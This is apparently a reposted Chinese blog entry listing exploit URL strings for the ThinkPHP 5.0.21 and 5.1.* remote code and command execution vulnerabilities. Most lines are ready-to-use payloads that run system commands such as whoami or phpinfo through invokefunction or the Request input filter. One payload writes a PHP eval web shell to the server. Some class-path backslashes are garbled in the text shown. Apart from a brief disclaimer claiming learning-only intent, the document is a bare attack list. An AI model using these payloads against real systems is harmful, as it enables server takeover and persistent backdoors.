ThinkPHP5.0.21&5.1.* 代码执行和命令执行漏洞利用

ThinkPHP5.0.21&5.1.* 代码执行和命令执行漏洞利用

ThinkPHP5.0.21&5.1.*  exploit code execution and command execution vulnerabilities

5.0.21

?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5.1.*
?s=index/ hinkRequest/input&filter=phpinfo&data=1

?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/ hinkRequest/input&filter=system&data=whoami

?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/ hink emplatedriverfile/write&cacheFile=md5.inc.php&content=%3C?php%20@eval($_POST['c']);?%3E

以上EXP仅用于学习、测试,切勿用作其它用途。

原文地址:https://www.cnblogs.com/iAmSoScArEd/p/10479737.html